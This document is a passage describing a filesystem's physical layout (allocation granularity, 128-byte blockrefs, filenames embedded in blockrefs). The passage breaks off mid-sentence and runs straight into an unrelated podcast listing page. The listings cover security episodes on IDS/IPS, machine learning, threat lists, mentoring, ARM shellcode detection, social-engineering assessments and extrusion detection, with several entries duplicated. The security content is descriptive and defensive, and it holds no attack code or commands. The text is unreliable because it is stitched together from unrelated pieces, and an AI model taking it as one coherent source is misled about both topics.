The design is in a good place. I'm quite happy with how the physical layout turned out. Allocations down to 1KB are supported. The freemap has a 16KB granularity with a linear counter (one counter per 512KB) for packing smaller allocations. Inodes are 1KB and can directly embed 512 bytes of file data for files <= 512 bytes. The freemap is also zoned by type for I/O locality. The blockrefs are 'fat' at 128 bytes but enormously powerful. That will allow us to ultimately support up to a 512-bit crypto hash and blind dedup using said hash. Not on release, but that's the plan.

I came up with an excellent solution for directory entries. The 1KB allocation granularity was a bit high but I didn't want to reduce it. However, because blockrefs are now 128 byte entities, and directory entries are hashed just like in H1, I was able to code them such that a directory entry is embedded in the blockref itself and does not require a separate data reference or allocation beyond that. Filenames up to 64 bytes long can be accommodated in the blockref using the check-code area of the blockref.
Longer filenames will use an additional data reference hanging off the blockref to accommodate up to 255 char filenames. Of course, a minimum of 1KB will have to be allocated in that case, but filenames are

Brakeing Down Security Podcast
2017-026-Machine_Learning-Market Hype, or infosec's blue team's newest weapon?

Brakeing Down Security Podcast

Play Episode Listen Later Aug 3, 2017 69:02


Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-026-Ally_miller_machine-learning-AI.mp3

Ally Miller (@selenakyle) joined us this week to discuss Machine Learning and #Artificial #Intelligence. It seems like every new security product employs one or both of these terms. She did the keynote at Bsides Las Vegas on topics of #Machine #Learning and #Behavioral #Economics. We asked Ms. Miller to join us here to discuss what ML and AI are, and how algorithms work to analyze the data to come to the right conclusion. What is required to get a useful algorithm, and how much or little human interaction is required? We also discuss a bit of history with her, how IDS/IPS were just dumber versions of machine learning, with 'tweaks' being new Yara or snort rules to tell the machine what to allow/disallow. Finally, for people who are doing our 2017 DerbyCon CTF, instructions on how to win are in the show, so please take a listen.

RSS: http://www.brakeingsecurity.com/rss
Youtube Channel: https://www.youtube.com/channel/UCZFjAqFb4A60M1TMa0t1KXw
#iTunes Store Link: https://itunes.apple.com/us/podcast/brakeing-down-security-podcast/id799131292?mt=2
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast

Join our #Slack Channel!
Sign up at https://brakesec.signup.team
#iHeartRadio App: https://www.iheart.com/show/263-Brakeing-Down-Securi/
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback: bds.podcast@gmail.com
Support Brakeing Down Security Podcast on #Patreon: https://www.patreon.com/bds_podcast
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/

show notes

what is the required amount of data required to properly train the algorithms
how do you ensure that the training data is clean (or perhaps how do you determine what causes a false positive or negative)
Xoke Soru: "why are you trying to make skynet and kill us all? Do you hate humanity?"
Who will ML replace? Who in security?
Ask why people get confused between AI and Machine learning, and where the fine line is between the two or is one actually a subset of the other.
Basically.. "in what way/how do you see ML being used in an offensive capacity in the future (or now)"

https://en.wikipedia.org/wiki/Artificial_neural_network
https://en.wikipedia.org/wiki/Machine_learning
https://en.wikipedia.org/wiki/Portal:Machine_learning
https://www.slideshare.net/allyslideshare/something-wicked-78511887
https://www.slideshare.net/allyslideshare/201209-a-million-mousetraps-using-big-data-and-little-loops-to-build-better-defenses
https://conferences.oreilly.com/velocity/vl-ca/public/schedule/detail/61751

O'Reilly Conference 31 October
Mick douglas class
Derbycon CTF
Book club
Patreon slack

Brakeing Down Security Podcast
2017-002: Threat Lists, IDS/IPS rules, and mentoring

Brakeing Down Security Podcast

Play Episode Listen Later Jan 21, 2017 65:41


In your environment, you deal with threats from all over the world. Many groups out there pool resources to help everyone deal with those #threats. Some come in the form of threat #intelligence from various intelligence companies, like #Carbon #Black, #FireEye, and #Crowdstrike. But what if your company cannot afford such products, or is not ready to engage those types of companies, and still needs protections? Never fear, there are open source options available (see show notes below). These products aren't perfect, but they will provide a modicum of protection from 'known' bad actors, SSH trolls, etc. We discuss some of the issues using them, and discuss how to use them in your #environment. Lastly, we discuss #mentorship. Having a good mentor/mentee relationship can be mutually beneficial to both parties. We discuss what it takes to be a good mentee, as well as a good mentor...

RSS: www.brakeingsecurity.com/rss
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2017-002-mentoring_threat_lists.mp3
iTunes: https://itunes.apple.com/us/podcast/2017-002-threat-lists-ids/id799131292?i=1000380246554&mt=2
YouTube: https://www.youtube.com/watch?v=oHNrINl1oZE

----------
HITB announcement: "Tickets are on sale, and entering special code 'brakeingsecurity' at checkout gets you a 10% discount". Brakeing Down Security thanks #Sebastian Paul #Avarvarei and all the organizers of #Hack In The Box (#HITB) for this opportunity! You can follow them on Twitter @HITBSecConf. Hack In the Box will be held from 10-14 April 2017. Find out more information here: http://conference.hitb.org/hitbsecconf2017ams/
---------

Join our #Slack Channel! Sign up at https://brakesec.signup.team
#RSS: http://www.brakeingsecurity.com/rss
#Google Play Store: https://play.google.com/music/m/Ifp5boyverbo4yywxnbydtzljcy?t=Brakeing_Down_Security_podcast
#SoundCloud: https://www.soundcloud.com/bryan-brake
Comments, Questions, Feedback, or Suggestions?
Contact us via Email: bds.podcast@gmail.com
#Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir
#Facebook: https://www.facebook.com/BrakeingDownSec/
#Tumblr: http://brakeingdownsecurity.tumblr.com/
#Player.FM : https://player.fm/series/brakeing-down-security-podcast
#Stitcher Network: http://www.stitcher.com/s?fid=80546&refid=stpr
#TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582

----------
Show Notes:

HANGOUTS: https://hangouts.google.com/call/w7rkkde5yrew5nm4n7bfw4wfjme

2017-002-Threat Lists, IDS/IPS rulesets, and infosec mentoring

Threat Lists (didn't have much time to research :/)
THIS EXACTLY - http://blogs.gartner.com/anton-chuvakin/2014/01/28/threat-intelligence-is-not-signatures/
Don't use threat list feeds (by IP/domain) as threat intelligence
Can use them for aggressively blocking, don't use for alerting
https://isc.sans.edu/suspicious_domains.html
https://rules.emergingthreats.net/fwrules/emerging-Block-IPs.txt
http://iplists.firehol.org/
https://zeltser.com/malicious-ip-blocklists/
https://medium.com/@markarenaau/actionable-intelligence-is-it-a-capability-problem-or-does-your-intelligence-provider-suck-d8d38b1cbd25#.ncpmqp9cx
Spamhaus: https://www.spamhaus.org/
leachers

Open rulesets - You can always depend on the kindness of strangers
Advantage is that these are created by companies that have worldwide reach
Updated daily
Good accompanying documentation
You can buy large rulesets to use in your own IDS implementation
Depends on your situation if you want to go managed or do yourself
Regardless you need to test them
Managed security services will do this for you
I don't recommend unless you have a team of dedicated people or you don't care about getting hacked - signatures are way too dynamic, like trying to do AV sigs all by yourself
Only a good idea for one-off, targeted attacks

DIY IDS/IPS rulesets
https://securityintelligence.com/signature-based-detection-with-yara/
http://yararules.com/
http://resources.infosecinstitute.com/yara-simple-effective-way-dissecting-malware/
Yara rules

For Mentors
Set expectations & boundaries
Find a good fit
Be an active listener
Keep open communication
Schedule time
Create homework
Don't assume technical level
Ask questions
Do your own research
Find a good fit
Put forth effort
It's not the Mentor's job to handhold, take responsibility for own learning
Value their time
Come to each meeting with an agenda

For Mentees
Mentoring frameworks?
InfoSec Mentoring
https://t.co/mLXjfF1HEr
https://gist.github.com/AFineDayFor/5cdd0341a2b384c20e615dcedeef0741

Podcasts (Courtesy of Ms. Hannelore)
https://t.co/mLXjfF1HEr
https://gist.github.com/AFineDayFor/5cdd0341a2b384c20e615dcedeef074

Securizando
Podcast – 04 – IPS/IDS

Securizando

Play Episode Listen Later Sep 28, 2016 12:06


In this episode I give an introduction to how IPS/IDS work, explaining what distinguishes them from firewalls (although nowadays most firewall solutions incorporate IDS/IPS services), and where the right place is to deploy one within our network.

Paul's Security Weekly TV
Enterprise Security Weekly #6 - IDS/IPS

Paul's Security Weekly TV

Play Episode Listen Later Jun 4, 2016 38:31


This week is, well, rough, ServiceNow buys threat intelligence company, memory scanning in the hypervisor, and next-generation network segmentation and NAC, and John and I discuss the evolution of IDS and IPS! Full Show Notes Here: http://wiki.securityweekly.com/wiki/index.php/ES_Episode6 Visit http://securityweekly.com/esw for all the latest episodes!

Paul's Security Weekly
Enterprise Security Weekly #6 - IDS/IPS

Paul's Security Weekly

Play Episode Listen Later Jun 4, 2016 38:31


This week is, well, rough, ServiceNow buys threat intelligence company, memory scanning in the hypervisor, and next-generation network segmentation and NAC, and John and I discuss the evolution of IDS and IPS! Full Show Notes Here: http://wiki.securityweekly.com/wiki/index.php/ES_Episode6 Visit http://securityweekly.com/esw for all the latest episodes!

Enterprise Security Weekly (Audio)
Enterprise Security Weekly #6 - IDS/IPS

Enterprise Security Weekly (Audio)

Play Episode Listen Later Jun 1, 2016 38:31


This week is, well, rough, ServiceNow buys threat intelligence company, memory scanning in the hypervisor, and next-generation network segmentation and NAC, and John and I discuss the evolution of IDS and IPS! Full Show Notes Here: http://wiki.securityweekly.com/wiki/index.php/ES_Episode6 Visit http://securityweekly.com/esw for all the latest episodes!

Enterprise Security Weekly (Video)
Enterprise Security Weekly #6 - IDS/IPS

Enterprise Security Weekly (Video)

Play Episode Listen Later Jun 1, 2016 38:31


This week is, well, rough, ServiceNow buys threat intelligence company, memory scanning in the hypervisor, and next-generation network segmentation and NAC, and John and I discuss the evolution of IDS and IPS! Full Show Notes Here: http://wiki.securityweekly.com/wiki/index.php/ES_Episode6 Visit http://securityweekly.com/esw for all the latest episodes!

DEF CON 22 [Materials] Speeches from the Hacker Convention.
Svetlana Gaivoronski and Ivan Petrov - Shellcodes for ARM: Your Pills Don't Work on Me, x86

DEF CON 22 [Materials] Speeches from the Hacker Convention.

Play Episode Listen Later Dec 13, 2014


Slides Here: https://defcon.org/images/defcon-22/dc-22-presentations/Petrov-Gaivoronski/DEFCON-22-Ivan-Petrov-Svetlana-Gaivoronski-ShellCodes-for-ARM-Updated.pdf
Extra Materials are available here: https://defcon.org/images/defcon-22/dc-22-presentations/Petrov-Gaivoronski/DEFCON-22-Ivan-Petrov-Svetlana-Gaivoronski-ShellCodes-for-ARM.avi

Shellcodes for ARM: Your Pills Don't Work on Me, x86
Svetlana Gaivoronski, PHD STUDENT, MOSCOW STATE UNIVERSITY, RUSSIA
Ivan Petrov, MASTERS STUDENT, MOSCOW STATE UNIVERSITY, RUSSIA

Despite it being almost 2014, the problem of shellcode detection, discovered in 1999, is still a challenge for researchers in industry and academia. The significance of remotely exploitable vulnerabilities does not seem to fade away. The number of remotely exploitable vulnerabilities continues to grow despite the significant efforts in improving code quality via code analysis tools, code review, and a plethora of testing methods. The other trend of recent years is the rise of a variety of ARM-based devices such as mobile phones, tablets, etc. As of now the total number of ARM-based devices exceeds the number of PCs several times over. This trend is sometimes terrifying, as people trust almost all aspects of their lives to such digital devices. People care much more about convenience than security of the data. For example, mobile phones now know our financial information and health records, and keep a lot of other private data. That's why ARM-based systems became a cherry pie for attackers. There is a variety of shellcode detection methods that work more or less acceptably with x86-based shellcodes. There are even hybrid solutions that combine capabilities of existing approaches. Unfortunately, almost all of them focus on a fixed set of shellcode features, specific to the x86 architecture. This work aims to cover this gap.
This work makes the following contributions:
• We provide an analysis of existing shellcode detection methods with regard to their applicability to shellcodes developed for the ARM architecture. As a result, we show that most existing algorithms are not applicable to shellcodes written for ARM. Moreover, the methods that work for ARM shellcodes produce too many false positives to be applicable for real-life network channels and 0-day detection.
• We analyzed available ARM-based shellcodes from public exploit databases, and identified a set of ARM shellcode features that distinguishes them from x86 shellcodes and benign binaries.
• We implemented our detectors of ARM shellcode features as an extension for the Demorpheus[1] shellcode detection open-source library. The algorithm used for generation of the detectors' topology guarantees the solution to be optimal in terms of computational complexity and false positive rate.

Svetlana Gaivoronski is a PhD student at Computer Systems Lab, Computer Science Dept. of Moscow State University, Russia. Svetlana was a member of the Bushwhackers CTF team. Svetlana worked at the Redsecure project (experimental IDS/IPS) at Moscow State University. In summer 2013 Svetlana worked at Microsoft Research on a botnet detection in clouds project. Now Svetlana works on shellcode-detection and DDoS-mitigation projects. Her primary interests are network worm propagation detection and filtering, shellcode detection, static and runtime analysis of malware, DDoS detection and filtering. Twitter: @SadieSv

Ivan Petrov is a master's student at Computer Systems Lab, Computer Science Dept. of Moscow State University, Russia. Ivan is an active member of the Bushwhackers CTF team, which is the winner of the iCTF competition this year. Ivan works on shellcode-detection projects. His primary interests are mobile security and network security, including analysis of ARM-based malware. Twitter: _IvanPetrov_

Brakeing Down Security Podcast
Episode 10: IDS/IPS

Brakeing Down Security Podcast

Play Episode Listen Later Mar 30, 2014 36:26


We discuss IDS and IPS, why they are needed, and why they get a pass on how easily they are bypassed, and why AV gets all the press... Intro "Private Eye", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com) Licensed under Creative Commons: By Attribution 3.0 http://creativecommons.org/licenses/by/3.0/

Paul's Security Weekly
Security Weekly - Security Weekly - Episode 217 Part 2 - October 28, 2010

Paul's Security Weekly

Play Episode Listen Later Oct 31, 2010 92:01


IDS / IPS theme continues with a tech segment from "the Other guy" proving he is not just another pretty face on the podcast. Then Dlink DCC bypass made simple by Paul. Of course stories, and we all LOVE stories. Episode 217 Show Notes. Episode 217 part 2 Direct Audio Download. Security Weekly YouTube Channel. Hosts: Paul Asadoorian, John Strand, Larry Pesce, Carlos Perez

Verizon Business – Connected Social Media

Distributed Denial of Service (DDoS) attacks are a growing threat for Internet-enabled businesses. Cindy Bellefeuille and Chris Hunsaker, security experts at Verizon Business, discuss DDoS attacks and alternatives to traditional security services such as firewalls and IDS/IPS solutions.

CERIAS Security Seminar Podcast
Ehab Al-Shaer, Ph.D., Toward Autonomic Security Policy Management

CERIAS Security Seminar Podcast

Play Episode Listen Later Aug 23, 2006 34:32


The assurance of network security is dependent not only on the protocols but also on policies that determine the functional behavior of network security devices. Network security devices such as Firewalls, IPSec gateways, IDS/IPS operate based on locally configured access control policies. However, the complexity of managing security policies, particularly in enterprise networks, poses many challenges for deploying effective security. For example, security policies are usually configured in isolation from each other, even though they are not necessarily independent as they interact with each other to form the global security policy. As a result of such ad-hoc management, policy inconsistencies and network vulnerability are created. In addition, security policy might grow in size, causing a significant performance overhead in security devices. A major performance gain can be achieved if policies can be dynamically optimized to adapt to traffic properties (called traffic-aware policy optimization). This talk will explain these challenges and present the recent research results in the area of automated verification and optimization of network security policies. About the speaker: Ehab Al-Shaer is an Associate Professor and the Director of Multimedia Networking Research Lab (MNLAB) in the School of Computer Science, Telecommunications and Information System at DePaul University. He received his Ph.D. in CS from Old Dominion University, M.S. in CS from Northeastern University, and B.Sc. in CompEng from KFUPM in 1998, 1994, and 1990 respectively. His primary research areas are Network Security, Internet monitoring, fault management, and multimedia protocols. Prof. Al-Shaer has many refereed journal and conference publications in his area. He is a Co-Editor of a number of books in the area of multimedia management and Internet monitoring. Prof. Al-Shaer is currently the program co-chair for IM'07, the premier conference in network management.
He was also the Conference Program Co-chair for MMNS'01, E2EMON'03-06. He also served as steering committee member, TPC member, guest speaker, panelist, tutorial presenter, for many IEEE/ACM conferences and industry seminars. Prof. Al-Shaer was a Guest Editor for many journals. He received a fellowship award from NASA Langley Research Center in 1997. His research is sponsored in part by NSF, Cisco, Intel, Sun Microsystems, Aramco and Aprisma.

CERIAS Security Seminar Podcast
Ehab Al-Shaer, Ph.D., "Toward Autonomic Security Policy Management"

CERIAS Security Seminar Podcast

Play Episode Listen Later Aug 23, 2006


The assurance of network security is dependent not only on the protocols but also on policies that determine the functional behavior of network security devices. Network security devices such as Firewalls, IPSec gateways, IDS/IPS operate based on locally configured access control policies. However, the complexity of managing security policies, particularly in enterprise networks, poses many challenges for deploying effective security. For example, security policies are usually configured in isolation from each other, even though they are not necessarily independent as they interact with each other to form the global security policy. As a result of such ad-hoc management, policy inconsistencies and network vulnerability are created. In addition, security policy might grow in size, causing a significant performance overhead in security devices. A major performance gain can be achieved if policies can be dynamically optimized to adapt to traffic properties (called traffic-aware policy optimization). This talk will explain these challenges and present the recent research results in the area of automated verification and optimization of network security policies.

Black Hat Briefings, Las Vegas 2005 [Video] Presentations from the security conference
Joseph Klein: The Social Engineering Engagement Methodology - A Formal Testing process of the People and Process

Black Hat Briefings, Las Vegas 2005 [Video] Presentations from the security conference

Play Episode Listen Later Jun 4, 2006 40:54


The security of an organization is composed of technology, people and processes. In the last few years, many organizations have done a good job addressing technology but have focused very little on the people and processes. This presentation reviews the formal methodology for performing Social Engineering Engagements. The method is divided into four sections including the Pre-Engagement, Pre-Assessment, Assessment and Post-Assessment. The Pre-Engagement is the sales process for performing the assessment. In this section, we will review the business justification and headlines of current attacks. Pre-Assessment is focused on identifying the scope of the project, limitations, targets and attack vectors. Also included are examples of what information must be gathered for use in the assessment and post assessment phase. The most interesting and tedious part is the actual assessment. In this section, we will discuss how to engage the target, utilize company information, how to achieve the goal and what to do when you are caught. Included in this section is also how and what to document about every contact. Post assessment is the analysis and reporting phase. In it, we will review documenting findings, and mapping them to recommendations. Joe Klein, CISSP is Senior Security Consultant at Honeywell and a member of the IPv6 Business Council. He performs network, application, web-application, wireless, source-code, host security reviews and security architecture design services for clients in the commercial and government space. Prior to joining Honeywell, Joe worked as a consultant performing attack and penetration assessments for many significant companies in the IT arena. While consulting, Joe also taught "Hacking and Incident Handling", "IDS/IPS management" and "Managing Network Security" at a local college in Jacksonville Florida. He regularly speaks at conferences including Defcon, InfoSecWorld, PhreakNic and regional meetings including Infragard, ASIS and ISSA.

Black Hat Briefings, Las Vegas 2005 [Audio] Presentations from the security conference
Joseph Klein: The Social Engineering Engagement Methodology - A Formal Testing process of the People and Process

Black Hat Briefings, Las Vegas 2005 [Audio] Presentations from the security conference

Play Episode Listen Later Jun 4, 2006 40:54


The security of an organization is composed of technology, people and processes. In the last few years, many organizations have done a good job addressing technology but have focused very little on the people and processes. This presentation reviews the formal methodology for performing Social Engineering Engagements. The method is divided into four sections including the Pre-Engagement, Pre-Assessment, Assessment and Post-Assessment. The Pre-Engagement is the sales process for performing the assessment. In this section, we will review the business justification and headlines of current attacks. Pre-Assessment is focused on identifying the scope of the project, limitations, targets and attack vectors. Also included are examples of what information must be gathered for use in the assessment and post assessment phase. The most interesting and tedious part is the actual assessment. In this section, we will discuss how to engage the target, utilize company information, how to achieve the goal and what to do when you are caught. Included in this section is also how and what to document about every contact. Post assessment is the analysis and reporting phase. In it, we will review documenting findings, and mapping them to recommendations. Joe Klein, CISSP is Senior Security Consultant at Honeywell and a member of the IPv6 Business Council. He performs network, application, web-application, wireless, source-code, host security reviews and security architecture design services for clients in the commercial and government space. Prior to joining Honeywell, Joe worked as a consultant performing attack and penetration assessments for many significant companies in the IT arena. While consulting, Joe also taught "Hacking and Incident Handling", "IDS/IPS management" and "Managing Network Security" at a local college in Jacksonville Florida. He regularly speaks at conferences including Defcon, InfoSecWorld, PhreakNic and regional meetings including Infragard, ASIS and ISSA.

Black Hat Briefings, USA 2007 [Audio] Presentations from the security conference.
Eric Monti & Dan Moniz: Defeating Extrusion Detection

Black Hat Briefings, USA 2007 [Audio] Presentations from the security conference.

Play Episode Listen Later Jan 9, 2006 83:38


Today's headlines are rife with high profile information leakage cases affecting major corporations and government institutions. Most of the highest-profile leakage news has been about stolen laptops (VA, CPS), or large-scale external compromises of customer databases (TJX). On a less covered, but much more commonplace basis, sensitive financial data, company secrets, and customer information move in and out of networks and on and off of company systems all the time. Where it goes can be hard to pin down. How can a company prevent (let alone detect) Alice taking a snapshot of the customer database or financial projections and posting them on internet forums or even dumping them to a floppy disk? This, understandably, has a lot of people worried. In response, many organizations have begun looking for technologies to detect and prevent sensitive information from leaving their networks, servers, workstations, and even buildings. For some time a product space for "Extrusion Detection" products has existed. But now the space is exploding and as tends to happen, security problems abound. Some "Extrusion Detection" products rely on network gateway IPS/IDS approaches, whereas others work in a way more closely resembling host-based IDS/IPS. The main difference is that instead of detecting/preventing malicious information from entering a company's perimeter, they focus on keeping assets *inside*. We've been evaluating a number of products in this space and have run across a large number of vulnerabilities. They range from improper evidence handling, to inherent design issues, all the way to complete compromise of an enterprise, using the Extrusion Detection framework itself as the vehicle.

Black Hat Briefings, USA 2007 [Video] Presentations from the security conference.
Eric Monti & Dan Moniz: Defeating Extrusion Detection

Black Hat Briefings, USA 2007 [Video] Presentations from the security conference.

Play Episode Listen Later Jan 9, 2006 83:38


Today's headlines are rife with high profile information leakage cases affecting major corporations and government institutions. Most of the highest-profile leakage news has been about stolen laptops (VA, CPS), or large-scale external compromises of customer databases (TJX). On a less covered, but much more commonplace basis, sensitive financial data, company secrets, and customer information move in and out of networks and on and off of company systems all the time. Where it goes can be hard to pin down. How can a company prevent (let alone detect) Alice taking a snapshot of the customer database or financial projections and posting them on internet forums or even dumping them to a floppy disk? This, understandably, has a lot of people worried. In response, many organizations have begun looking for technologies to detect and prevent sensitive information from leaving their networks, servers, workstations, and even buildings. For some time a product space for "Extrusion Detection" products has existed. But now the space is exploding and as tends to happen, security problems abound. Some "Extrusion Detection" products rely on network gateway IPS/IDS approaches, whereas others work in a way more closely resembling host-based IDS/IPS. The main difference is that instead of detecting/preventing malicious information from entering a company's perimeter, they focus on keeping assets *inside*. We've been evaluating a number of products in this space and have run across a large number of vulnerabilities. They range from improper evidence handling, to inherent design issues, all the way to complete compromise of an enterprise, using the Extrusion Detection framework itself as the vehicle.